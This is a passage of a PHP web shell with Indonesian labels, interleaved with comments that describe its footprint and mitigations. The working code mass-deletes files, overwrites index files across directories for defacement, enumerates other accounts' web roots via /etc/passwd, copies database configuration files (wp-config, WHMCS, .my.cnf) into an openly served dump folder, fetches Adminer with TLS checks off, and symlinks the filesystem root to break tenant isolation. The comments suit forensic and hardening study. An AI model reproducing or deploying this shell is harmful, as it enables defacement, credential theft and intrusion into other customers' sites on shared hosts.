  642. } else {
  643. if(is_dir($dirc)) {
  644. if(is_writable($dirc)) {
  // $lokasi is a non-empty string, so this test does not check that the file exists.
  645. if($lokasi) {
  646. echo "$lokasi > Terhapus\n";
  647. unlink($lokasi);
  648. $massdel = hapus_massal($dirc,$namafile);
  649. }
  650. }
  651. }
  652. }
  653. }
  654. }
  655. }
  656.  
  657. if($_POST['start']) {
  658. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
  659. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  660. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
  661. } else {
  662. echo "<form method='post'>
  663. <p><i class='fa fa-folder'></i> Lokasi</p>
  664. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  665. <p><i class ='fa fa-file'></i> Nama File</p>
  666. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br>
  667. <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>
  668. </form>";
  669. }
  670. exit;
  671. }
  672.  
  673.  
  674.  
  675. /*
  676. Mass Deface
  677. */
  // Bulk overwrite handler. On POST 'start' it writes $_POST['script'] to a file named
  // $_POST['d_file'] under $_POST['d_dir'], using tipe_massal() when tipe is 'mahal' and
  // tipe_biasa() when tipe is 'murah'; otherwise it renders the form. The script exits
  // after this handler.
  // Defender note: file_put_contents() replaces existing files, so the on-disk footprint is
  // the same file name with identical content and near-identical modification times across
  // many directories. Recovery means restoring from backup, not just deleting the new files.
  // Mitigation: web roots not writable by the PHP user, per-site users on shared hosts, and
  // file-integrity monitoring on index files.
  678. if($_GET['aksi'] == 'MassDeface') {
  679.  
  // tipe_massal: recursive variant. When $dir is writable, writes $isi_script to $namafile
  // in $dir ('.'), in $dir's parent ('..') and in every writable subdirectory, then
  // recurses into each of those subdirectories.
  680. function tipe_massal($dir,$namafile,$isi_script) {
  681. if(is_writable($dir)) {
  682. $dira = scandir($dir);
  683. foreach($dira as $dirb) {
  684. $dirc = "$dir/$dirb";
  685. $lokasi = $dirc.'/'.$namafile;
  686. if($dirb === '.') {
  687. file_put_contents($lokasi, $isi_script);
  688. } elseif($dirb === '..') {
  689. file_put_contents($lokasi, $isi_script);
  690. } else {
  691. if(is_dir($dirc)) {
  692. if(is_writable($dirc)) {
  693. echo "Berhasil => $lokasi\n";
  694. file_put_contents($lokasi, $isi_script);
  695. $MassDeface = tipe_massal($dirc,$namafile,$isi_script);
  696. }
  697. }
  698. }
  699. }
  700. }
  701. }
  702.  
  // tipe_biasa: single-level variant. Same writes as tipe_massal for $dir, its parent and
  // its immediate writable subdirectories, but without recursion.
  703. function tipe_biasa($dir,$namafile,$isi_script) {
  704. if(is_writable($dir)) {
  705. $dira = scandir($dir);
  706. foreach($dira as $dirb) {
  707. $dirc = "$dir/$dirb";
  708. $lokasi = $dirc.'/'.$namafile;
  709. if($dirb === '.') {
  710. file_put_contents($lokasi, $isi_script);
  711. } elseif($dirb === '..') {
  712. file_put_contents($lokasi, $isi_script);
  713. } else {
  714. if(is_dir($dirc)) {
  715. if(is_writable($dirc)) {
  716. echo "Berhasil => $dirb/$namafile\n";
  717. file_put_contents($lokasi, $isi_script);
  718. }
  719. }
  720. }
  721. }
  722. }
  723. }
  724.  
  725. if($_POST['start']) {
  726.  
  727. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
  728. if($_POST['tipe'] == 'mahal') {
  729. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  730. } elseif($_POST['tipe'] == 'murah') {
  731. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  732. }
  733. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
  734. } else {
  735. echo "<form method='post'>
  736. <center>
  737. <p>{ Type Mass Deface }</p>
  738. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
  739. <label for='toggle-on' class='butn'>Biasa</label>
  740. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
  741. <label for='toggle-off' class='butn'>Masal</label>
  742. </center><hr>
  743. <p><i class='fa fa-folder'></i> Lokasi</p>
  744. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  745. <p><i class ='fa fa-file'></i> Nama File</p>
  746. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>
  747. <p><i class ='fa fa-file'></i> Isi File</p>
  748. <textarea name='script' class='form-control' rows='5' placeholder='Hacked By 22XploiterCrew'></textarea><br/>
  749. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
  750. </form>";
  751. }
  752. exit;
  753. }
  754.  
  755.  
  756.  
  757. /*
  758. Jumping
  759. */
  // Cross-account enumeration on a shared host: lists other users' web roots and marks each
  // as readable (R) or writable (RW) for the current PHP user, with a link that re-enters
  // this script at that directory. Three layouts are handled, chosen by matching $dir:
  //   - "hsphere": users from /etc/passwd combined with domains posted in 'url';
  //   - "vhosts":  /var/www/vhosts/<domain>/httpdocs for each posted domain;
  //   - default:   /home/<user>/public_html for each user in /etc/passwd, with
  //                /etc/named.conf and the owner of /etc/valiases/<domain> used to map a
  //                user to a domain when posix_getpwuid() exists.
  // bing() is called in the vhosts branch but is not defined in the visible part of the file.
  // Defender note: every R or RW line this handler can print is a tenant-isolation finding.
  // Mitigation: run each site under its own system user / PHP pool, restrict PHP with
  // open_basedir, and keep home and web-root directories closed to other accounts.
  760. if($_GET['aksi'] == 'jumping') {
  761. $i = 0;
  762. echo "<div class='card container'>";
  763. if(preg_match("/hsphere/", $dir)) {
  764. $urls = explode("\r\n", $_POST['url']);
  765. if(isset($_POST['jump'])) {
  766. echo "<pre>";
  767. foreach($urls as $url) {
  768. $url = str_replace(array("http://","www."), "", strtolower($url));
  769. $etc = "/etc/passwd";
  770. $f = fopen($etc,"r");
  771. while($gets = fgets($f)) {
  772. $pecah = explode(":", $gets);
  773. $user = $pecah[0];
  774. $dir_user = "/hsphere/local/home/$user";
  775. if(is_dir($dir_user) === true) {
  776. $url_user = $dir_user."/".$url;
  777. if(is_readable($url_user)) {
  778. $i++;
  779. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  780. if(is_writable($url_user)) {
  781. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  782. }
  783. echo $jrw."<br>";
  784. }
  785. }
  786. }
  787. }
  788. if($i == 0) {
  789. } else {
  790. echo "<br>Total ada ".$i." di ".$ip;
  791. }
  792. echo "</pre>";
  793. } else {
  794. echo '<center>
  795. <form method="post">
  796. List Domains: <br>
  797. <textarea name="url" class="form-control">';
  // The form is pre-filled with the contents of the hsphere sites list, echoed unescaped.
  798. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  799. while($getss = fgets($fp)) {
  800. echo $getss;
  801. }
  802. echo '</textarea><br>
  803. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  804. </form></center>';
  805. }
  806. } elseif(preg_match("/vhosts/", $dir)) {
  807. $urls = explode("\r\n", $_POST['url']);
  808. if(isset($_POST['jump'])) {
  809. echo "<pre>";
  810. foreach($urls as $url) {
  811. $web_vh = "/var/www/vhosts/$url/httpdocs";
  812. if(is_dir($web_vh) === true) {
  813. if(is_readable($web_vh)) {
  814. $i++;
  815. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  816. if(is_writable($web_vh)) {
  817. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  818. }
  819. echo $jrw."<br>";
  820. }
  821. }
  822. }
  823. if($i == 0) {
  824. } else {
  825. echo "<br>Total ada ".$i." Kamar di ".$ip;
  826. }
  827. echo "</pre>";
  828. } else {
  829. echo '<center>
  830. <form method="post">
  831. List Domains: <br>
  832. <textarea name="url" class="form-control">';
  833. bing("ip:$ip");
  834. echo '</textarea><br>
  835. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  836.  
  837. </form></center>';
  838. }
  839. } else {
  840. echo "<pre>";
  841. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
  842. while($passwd = fgets($etc)) {
  843. if($passwd == '' || !$etc) {
  844. echo "<font color=red>Can't read /etc/passwd</font><br/>";
  845. } else {
  // Account names are taken from the text before ":x:" on each passwd line.
  846. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  847. foreach($user_jumping[1] as $user_pro_jump) {
  848. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  849. if(is_readable($user_jumping_dir)) {
  850. $i++;
  851. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  852. if(is_writable($user_jumping_dir)) {
  853. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  854. }
  855. echo $jrw;
  856. if(function_exists('posix_getpwuid')) {
  857. $domain_jump = file_get_contents("/etc/named.conf");
  858. if($domain_jump == '') {
  859. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  860. } else {
  861. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  862. foreach($domains_jump[1] as $dj) {
  863. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  864. $user_jumping_url = $user_jumping_url['name'];
  865. if($user_jumping_url == $user_pro_jump) {
  866. echo " => ( <u>$dj</u> )<br>";
  867. break;
  868. }
  869. }
  870. }
  871. } else {
  872. echo "<br>";
  873. }
  874. }
  875. }
  876. }
  877. }
  878. if($i == 0) {
  879. } else {
  880. echo "<br>Total ada ".$i." Kamar di ".$ip;
  881. }
  882. echo "</pre>";
  883. }
  884. echo "</div>";
  885. }
  886.  
  887. /*
  888. Config
  Action `aksi=config`. Walks /etc/passwd and, for every account whose
  /home/<user>/public_html/ is readable by the PHP process, copies each non-empty
  file from the fixed path list below into ./codexploit_configs/<user>-<label>.txt.
  The listed paths are configuration files of common CMS, forum, shop and billing
  packages, so the copies should be assumed to contain database credentials.
  Artifacts to look for: a `codexploit_configs` directory (created with mode 0777)
  holding a `.htaccess` and `<user>-<label>.txt` files, plus access-log entries
  carrying `aksi=config`.
  What limits it: it can only read what the web server user can read. Per-account
  PHP users, home directories that are not world-readable, `open_basedir`, and
  0600/0640 modes on application config files make these reads return nothing.
  Response: treat every credential present in a copied file as exposed and rotate it.
  889. */
  890. if($_GET['aksi'] == 'config') {
  891. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  // Dump directory is created relative to the current working directory.
  892. $con = mkdir("codexploit_configs", 0777);
  // NOTE(review): this .htaccess content looks intended to lift access restrictions on the
  // dump directory; whether Apache accepts it depends on version and AllowOverride - confirm.
  893. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  894. $htc = fopen("codexploit_configs/.htaccess","w");
  895. fwrite($htc, $isi_htc);
  896. while($passwd = fgets($etc)) {
  897. if($passwd == "" || !$etc) {
  898. echo "<font color=red>Can't read /etc/passwd</font>";
  899. } else {
  // Account name = text before ":x:" on the passwd line.
  900. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  901. foreach($user_config[1] as $user_con) {
  902. $user_config_dir = "/home/$user_con/public_html/";
  903. if(is_readable($user_config_dir)) {
  // Map of candidate file path => label used in the output file name.
  904. $grab_config =
  905. [
  906. "/home/$user_con/.my.cnf" => "cpanel",
  907. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  908. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  909. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  910. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
  911. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  912. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  913. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  914. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  915. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  916. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  917. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  918. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  919. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  920. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  921. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  922. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  923. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  924. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  925. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  926. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  927. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  928. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  929. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  930. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  931. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  932. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  933. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  934. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  935. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
  936. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  937. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  938. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  939. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  940. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  941. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
  942. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  943. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  944. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  945. "/home/$user_con/public_html/configuration.php" => "Joomla",
  946. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  947. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  948. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  949. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  950. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  951. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  952. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  953. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  954. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  955. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  956. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  957. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  958. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  959. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  960. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  961. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  962. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  963. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  964. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  965. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
  966. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  967. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  968. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  969. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  970. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  971. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  972. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  973. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  974. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  975. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  976. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  977. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  978. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  979. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  980. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  981. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  982. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  983. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  984. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  985. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  986. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  987. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  988. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  989. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  990. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  991. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  992. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  993. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  994. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  995. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  996. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  997. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  998. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  999. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  1000. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
  1001. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  1002. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  1003. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  1004. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  1005. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  1006. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1007. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1008. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1009. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  1010. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1011. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  1012. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  1013. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1014. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1015. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1016. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  1017. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  1018. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  1019. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  1020. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  1021. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  1022. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  1023. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  1024. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  1025. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  1026. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  1027. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  1028. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1029. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  1030. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  1031. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1032. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  1033. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  1034. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  1035. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  1036. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  1037. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1038. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  1039. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  1040. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1041. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1042. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1043. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  1044. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  1045. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  1046. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  1047. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1048. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  1049. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  1050. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  1051. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  1052. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  1053. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1054. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  1055. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  1056. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  1057. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  1058. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  1059. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  1060. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  1061. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  1062. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  1063. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  1064. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  1065. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  1066. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  1067. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  1068. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  1069. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  1070. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  1071. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  1072. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1073. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  1074. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  1075. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  1076. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  1077. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1078. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  1079. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  1080. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1081. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  1082. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1083. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  1084. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  1085. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  1086. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  1087. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1088. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1089. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  1090. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  1091. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  1092. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  1093. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1094. ];
  // Copy step: every candidate that yields non-empty content is written into the dump directory.
  1095. foreach($grab_config as $config => $nama_config) {
  1096. $ambil_config = file_get_contents($config);
  1097. if($ambil_config == '') {
  1098. } else {
  1099. $file_config = fopen("codexploit_configs/$user_con-$nama_config.txt","w");
  1100. fputs($file_config,$ambil_config);
  1101. }
  1102. }
  1103. }
  1104. }
  1105. }
  1106. }
  1107. echo "<center><a href='?dir=$path/codexploit_configs'><font color=lime>Done</font></a></center>";
  1108. }
  1109.  
  1110. /*
  1111. Adminer
  Action `aksi=adminer`. If ./adminer.php does not exist, downloads Adminer 4.2.4
  (a third-party database administration script) from www.adminer.org into
  ./adminer.php, then prints a link to it; if the file already exists only the link
  is printed. The script always exits afterwards.
  The download disables TLS certificate verification (CURLOPT_SSL_VERIFYPEER false),
  so the fetched file is not authenticated.
  Artifacts to look for: an unexpected adminer.php in a served directory, an outbound
  HTTPS request from the web server to www.adminer.org, and access-log entries
  carrying `aksi=adminer`.
  Mitigation: restrict outbound connections from the web tier and alert on new .php
  files appearing in served directories.
  1112. */
  1113. if($_GET['aksi'] == 'adminer') {
  // Web path of the current directory: $path with the document root prefix removed.
  1114. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  // adminer($url, $isi): fetch $url with cURL and stream the body into the file $isi.
  // Returns curl_exec()'s result. The statements after the return are unreachable,
  // so the cURL handle and the file handle are never closed explicitly.
  1115. function adminer($url, $isi) {
  1116. $fp = fopen($isi, "w");
  1117. $ch = curl_init();
  1118. curl_setopt($ch, CURLOPT_URL, $url);
  1119. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1120. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1121. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1122. curl_setopt($ch, CURLOPT_FILE, $fp);
  1123. return curl_exec($ch);
  1124. curl_close($ch);
  1125. fclose($fp);
  1126. ob_flush();
  1127. flush();
  1128. }
  1129. if(file_exists('adminer.php')) {
  1130. echo "<center><a href='$full/adminer.php' target='_blank'>-> Silahkan Login Adminer <-</a></font></center><br/>";
  1131. } else {
  1132. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1133. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
  1134. } else {
  1135. echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
  1136. }
  1137. }
  1138. exit;
  1139. }
  1140.  
  1141.  
  1142. /*
  1143. Symlink
  Action `aksi=symlink`. Reads the DNS zone list from ./named.txt when that file
  exists, otherwise from /etc/named.conf. For each line containing "zone" it extracts
  the zone name, looks up the owner of /etc/valiases/<zone> to get the account name,
  and prints a table row linking to sym/root/home/<account>/public_html.
  It also creates ./sym/root as a symbolic link to "/", which is what makes those
  links resolve outside the compromised account when the web server follows symlinks.
  Artifacts to look for: a `sym` directory containing a link named `root` that points
  to "/", and access-log requests under `sym/root/`.
  Mitigation: serve user content with `SymLinksIfOwnerMatch` rather than
  `FollowSymLinks`, do not let .htaccess re-enable it via AllowOverride, and keep
  home directories unreadable to other accounts.
  1144. */
  1145. if($_GET['aksi'] == 'symlink') {
  // Prefer a locally saved copy (written by the aksi=symread action) over the system file.
  1146. if(!is_file('named.txt')){
  1147. $d00m = @file("/etc/named.conf");
  1148. }else{
  1149. $d00m = @file("named.txt");
  1150. }
  1151. if(!$d00m) {
  1152. die ("<center>
  1153. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
  1154. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
  1155. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
  1156. <br/>
  1157. <font color='red'>Gagal Membaca /etc/named.conf</font>
  1158. <br/><br/></center>");
  1159. }
  1160. else{
  1161. echo "<center>
  1162. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
  1163. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
  1164. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
  1165. <div class='tmp'></center>
  1166. <table align='center' width='100%'>
  1167. <thead class='bg-info'>
  1168. <th>Domains</th>
  1169. <th>Users</th>
  1170. <th>symlink </th>
  1171. </thead>";
  1172. foreach($d00m as $dom){
  1173. if(eregi("zone",$dom)){
  1174. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1175. flush();
  1176. if(strlen(trim($domsws[1][0])) > 2){
  // Account name is derived from the owner of the zone's valiases file.
  1177. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1178. flush();
